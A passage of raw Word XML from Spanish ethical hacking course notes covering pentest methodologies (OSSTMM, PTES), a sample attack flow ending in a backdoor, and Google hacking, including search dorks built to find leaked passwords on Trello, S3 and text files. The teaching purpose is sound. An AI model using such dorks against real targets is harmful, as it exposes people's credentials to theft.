          <w:p w14:paraId="192D90FD" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t xml:space="preserve">             SQLmap, Burp Suite, Nessus</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="041FECF1" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494"/>
          <w:p w14:paraId="57D18169" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E55CE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CONFIDENCIALIDAD:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5E8B43" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>Este documento contiene información CONFIDENCIAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15115552" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>de seguridad. Distribución restringida solo a:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED9D1B8" w14:textId="5502E54F" w:rsidR="007C4494" w:rsidRPr="00FF1ECC" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E55CE0">
              <w:t>CEO, CTO, CISO, y equipo de seguridad autorizado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="531A020C" w14:textId="1A9A81AA" w:rsidR="0018367A" w:rsidRDefault="0018367A" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24216BBF" w14:textId="77777777" w:rsidR="005F4133" w:rsidRDefault="005F4133" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C53690A" w14:textId="77777777" w:rsidR="005F4133" w:rsidRDefault="005F4133" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1D1C38" w14:textId="77777777" w:rsidR="005F4133" w:rsidRDefault="005F4133" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638B5ED1" w14:textId="03DF539F" w:rsidR="005F4133" w:rsidRDefault="005F4133" w:rsidP="005F4133">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.7 METODOLOGIAS APLICADAS EN EL EJEMPLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD06E29" w14:textId="790DDA2A" w:rsidR="005F4133" w:rsidRDefault="005F4133" w:rsidP="005F4133">
      <w:r w:rsidRPr="005F4133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OSSTMM: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Es adaptable a diversos tipos de pruebas de seguridad como penetration testing y auditoria de caja blanca, </w:t>
      </w:r>
      <w:r w:rsidR="00AE35E5">
        <w:t>proporcionando un marco para las pruebas de penetración de red y evaluación de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA62E4" w14:textId="500DB98B" w:rsidR="00AE35E5" w:rsidRDefault="00AE35E5" w:rsidP="005F4133">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PTES: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Consiste en siete secciones principales que cubren todos los aspectos de las pruebas de penetración, estableciendo lo que las organizaciones deben esperar y proporcionando una </w:t>
      </w:r>
      <w:r w:rsidR="00D97B75">
        <w:t>línea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de base estandarizada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6CFA8" w14:textId="4F85F1B0" w:rsidR="00AE35E5" w:rsidRDefault="00D97B75" w:rsidP="005F4133">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESUMEN DEL FLUJO PRACTICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41F794" w14:textId="097090AB" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75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irmas contrato -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Define que puedes y no puedes atacar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA58FA9" w14:textId="2BD7CC78" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75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Recopilas info -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Encuentra subdominio test.finanzasegura.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0D032" w14:textId="3FBDCDF0" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75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scaneas -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Detectas SSH antiguo, MySQL expuesto, SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D906A0" w14:textId="2C8E6A45" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75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xplotas -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Bypaseas login, accedes como jperez</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603ABAB" w14:textId="312F9F89" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97B75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Post-explotacion -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D97B75">
        <w:t>Escalas a root, instala</w:t>
      </w:r>
      <w:r>
        <w:t>s backddoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517FD135" w14:textId="2D04552F" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75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Reportas -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Documento detallado con evidencias y soluciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A8D8B" w14:textId="77777777" w:rsidR="00D97B75" w:rsidRPr="00D97B75" w:rsidRDefault="00D97B75" w:rsidP="00D97B75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876BAC1" w14:textId="7D3DF006" w:rsidR="00C70A16" w:rsidRDefault="00C70A16" w:rsidP="00C70A16">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C70A16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ejemplos de informes de Hacking Ético y auditoría de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F28620" w14:textId="5DDC1841" w:rsidR="00C70A16" w:rsidRDefault="00C70A16" w:rsidP="00C70A16">
      <w:pPr>
        <w:ind w:left="360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682A2FE2" wp14:editId="6836B609">
            <wp:extent cx="4297680" cy="5069059"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="916767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88" cy="50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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F549A7E" wp14:editId="2CD36D69">
            <wp:extent cx="4297680" cy="3452788"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1889934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81" cy="345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67E7" w14:textId="77777777" w:rsidR="002C44B0" w:rsidRDefault="002C44B0" w:rsidP="00C70A16">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155E7970" w14:textId="0B012142" w:rsidR="002C44B0" w:rsidRPr="005A2D3A" w:rsidRDefault="005A2D3A" w:rsidP="00C70A16">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2D3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recopilación de información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC1417" w14:textId="651E9588" w:rsidR="005F4133" w:rsidRDefault="005A2D3A" w:rsidP="005A2D3A">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2D3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recopilación pasiva de información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F27D0EC" w14:textId="77777777" w:rsidR="005A2D3A" w:rsidRDefault="005A2D3A" w:rsidP="005A2D3A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77527A2E" w14:textId="0C0B3817" w:rsidR="007D7689" w:rsidRDefault="003F19DA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recolección</w:t>
      </w:r>
      <w:r w:rsidR="007D7689">
        <w:t xml:space="preserve"> de información sobre un objetivo determinado </w:t>
      </w:r>
      <w:r w:rsidR="007D7689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sin que las actividades </w:t>
      </w:r>
      <w:r w:rsidR="007D7689">
        <w:t xml:space="preserve">realizadas por el analista </w:t>
      </w:r>
      <w:r w:rsidR="007D7689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sean mínimamente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detectadas</w:t>
      </w:r>
      <w:r w:rsidR="007D7689">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D7689">
        <w:t>por dicho objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F59C55" w14:textId="40649233" w:rsidR="007D7689" w:rsidRDefault="003F19DA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Difícil de realizar y a menudo proporciona resultados poco concluyentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB335E" w14:textId="037EF871" w:rsidR="003F19DA" w:rsidRPr="003F19DA" w:rsidRDefault="003F19DA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La manera habitual de recolección pasiva de información es mediante el acceso a la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>información almacenada en lugares públicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AEE7E" w14:textId="4572293A" w:rsidR="003F19DA" w:rsidRDefault="003F19DA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Raramente se utiliza de manera individual</w:t>
      </w:r>
      <w:r w:rsidR="00066CFE">
        <w:t xml:space="preserve"> (combinado con semi pasivas y activas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4BF8B" w14:textId="7B2A419F" w:rsidR="00066CFE" w:rsidRPr="00C35C7D" w:rsidRDefault="00FF3377" w:rsidP="00FF3377">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.1 Hacking con buscadores: Google Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003302E6" w14:textId="54C3CD29" w:rsidR="004B0129" w:rsidRPr="00C35C7D" w:rsidRDefault="00ED7518" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando: consulta</w:t>
      </w:r>
      <w:r w:rsidR="005853DC" w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B1351B" w:rsidRPr="00B1351B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73678AE3" wp14:editId="664822C5">
            <wp:extent cx="4701947" cy="518205"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="630745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45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EB" w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D05EB" w:rsidRPr="005D05EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641487D0" wp14:editId="79A0BA11">
            <wp:extent cx="2133785" cy="472481"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="14170071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0712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129" w:rsidRPr="004B0129">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BB41688" wp14:editId="7FD3A27E">
            <wp:extent cx="3055885" cy="472481"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="9575584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5842" name="Imagen 1" descr="Interfaz de usuario gráfica,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2A" w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0086182A" w:rsidRPr="0086182A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EEF983D" wp14:editId="5AF2083A">
            <wp:extent cx="2514818" cy="617273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2121752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5277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8FF" w:rsidRPr="003068FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523E5B2C" wp14:editId="3D3C7AE8">
            <wp:extent cx="5151566" cy="571550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1497735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5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678" w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D5678" w:rsidRPr="005D5678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5152E6A3" wp14:editId="73403F27">
            <wp:extent cx="6858000" cy="691515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1608654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547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678" w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D5678" w:rsidRPr="005D5678">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A876410" wp14:editId="2716771B">
            <wp:extent cx="3185436" cy="701101"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1051099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96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CA22" w14:textId="3A7CFB9C" w:rsidR="00F10D4F" w:rsidRDefault="00F10D4F" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10D4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CD604B" wp14:editId="46B3730A">
            <wp:extent cx="3185436" cy="502964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17995455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455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A96A" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B65CDF" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7312D1" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEFB2B5" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CE694C" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BE27EA" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22615CF4" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534BF3F4" w14:textId="77777777" w:rsidR="00022841" w:rsidRDefault="00022841" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE39020" w14:textId="15E68D63" w:rsidR="00EC12BC" w:rsidRPr="00ED7518" w:rsidRDefault="00EC12BC" w:rsidP="00EC12BC">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC12BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.2 Google Hacking Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A8A58B" w14:textId="57AA561D" w:rsidR="00EC12BC" w:rsidRDefault="00B41CCF" w:rsidP="003F19DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B41CCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB67EFC" wp14:editId="1318126C">
            <wp:extent cx="4739640" cy="1739185"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2222854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85417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813" cy="17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A834" w14:textId="23320DF4" w:rsidR="00EF300B" w:rsidRDefault="009B6DFF" w:rsidP="00245F86">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00B41CCF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">nurl:https://trello.com AND intext:@gmail.com AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intext:password site:</w:t>
      </w:r>
      <w:r w:rsidR="002163B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002163B1" w:rsidRPr="002163B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s3 site:amazonaws.com filetype:xls password</w:t>
      </w:r>
      <w:r w:rsidR="002163B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0030140E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intext: “@gmail.com” intext:”password” inurl:/files/ ext:txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946E7C8" w14:textId="77777777" w:rsidR="00245F86" w:rsidRDefault="00245F86" w:rsidP="00245F86">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF13B40" w14:textId="008DFE7F" w:rsidR="00245F86" w:rsidRPr="00245F86" w:rsidRDefault="00245F86">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inurl:https://trello.com AND intext:@gmail.com AND intext:password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245F86" w:rsidRPr="00245F86" w14:paraId="025C6EB8" w14:textId="77777777" w:rsidTr="00445023">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BFE1AE" w14:textId="77777777" w:rsidR="00245F86" w:rsidRPr="00245F86" w:rsidRDefault="00245F86" w:rsidP="00245F86">
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">inurl:https://trello.com  </w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Busca URLs que contengan "trello.com"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D418B1B" w14:textId="77777777" w:rsidR="00245F86" w:rsidRPr="00245F86" w:rsidRDefault="00245F86" w:rsidP="00245F86">
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">AND                        </w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Operador lógico (deben cumplirse todas las condiciones)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66825BCE" w14:textId="77777777" w:rsidR="00245F86" w:rsidRPr="00245F86" w:rsidRDefault="00245F86" w:rsidP="00245F86">
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">intext:@gmail.com         </w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Páginas cuyo texto contenga "@gmail.com"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3208D53D" w14:textId="77777777" w:rsidR="00245F86" w:rsidRPr="00875709" w:rsidRDefault="00245F86" w:rsidP="00245F86">
            <w:r w:rsidRPr="00875709">
              <w:t>AND</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA3C8D6" w14:textId="17E9521D" w:rsidR="00245F86" w:rsidRPr="00245F86" w:rsidRDefault="00245F86" w:rsidP="00245F86">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">intext:password           </w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00245F86">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
